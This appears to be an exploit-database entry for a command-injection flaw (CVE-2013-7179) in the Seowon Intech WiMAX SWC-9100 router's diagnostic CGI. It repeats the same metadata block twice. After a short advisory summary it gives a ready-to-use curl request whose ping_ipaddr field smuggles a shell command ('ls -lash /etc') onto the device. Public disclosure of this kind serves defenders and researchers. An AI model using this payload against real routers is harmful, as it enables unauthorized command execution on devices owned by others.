Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution
| EKU-ID: 43433 | CVE: CVE-2013-7179;OSVDB-102818 | OSVDB-ID: |
| Author: Josue Rojas | Published: 2014-02-03 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 43433 | CVE: CVE-2013-7179;OSVDB-102818 | OSVDB-ID: |
| Author: Josue Rojas | Published: 2014-02-03 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/65306/info WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability. Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device. curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls -lash /etc%23&ping_count=1&action=Apply&html_view=ping" "http://www.example.com/cgi-bin/diagnostic.cgi" > /dev/null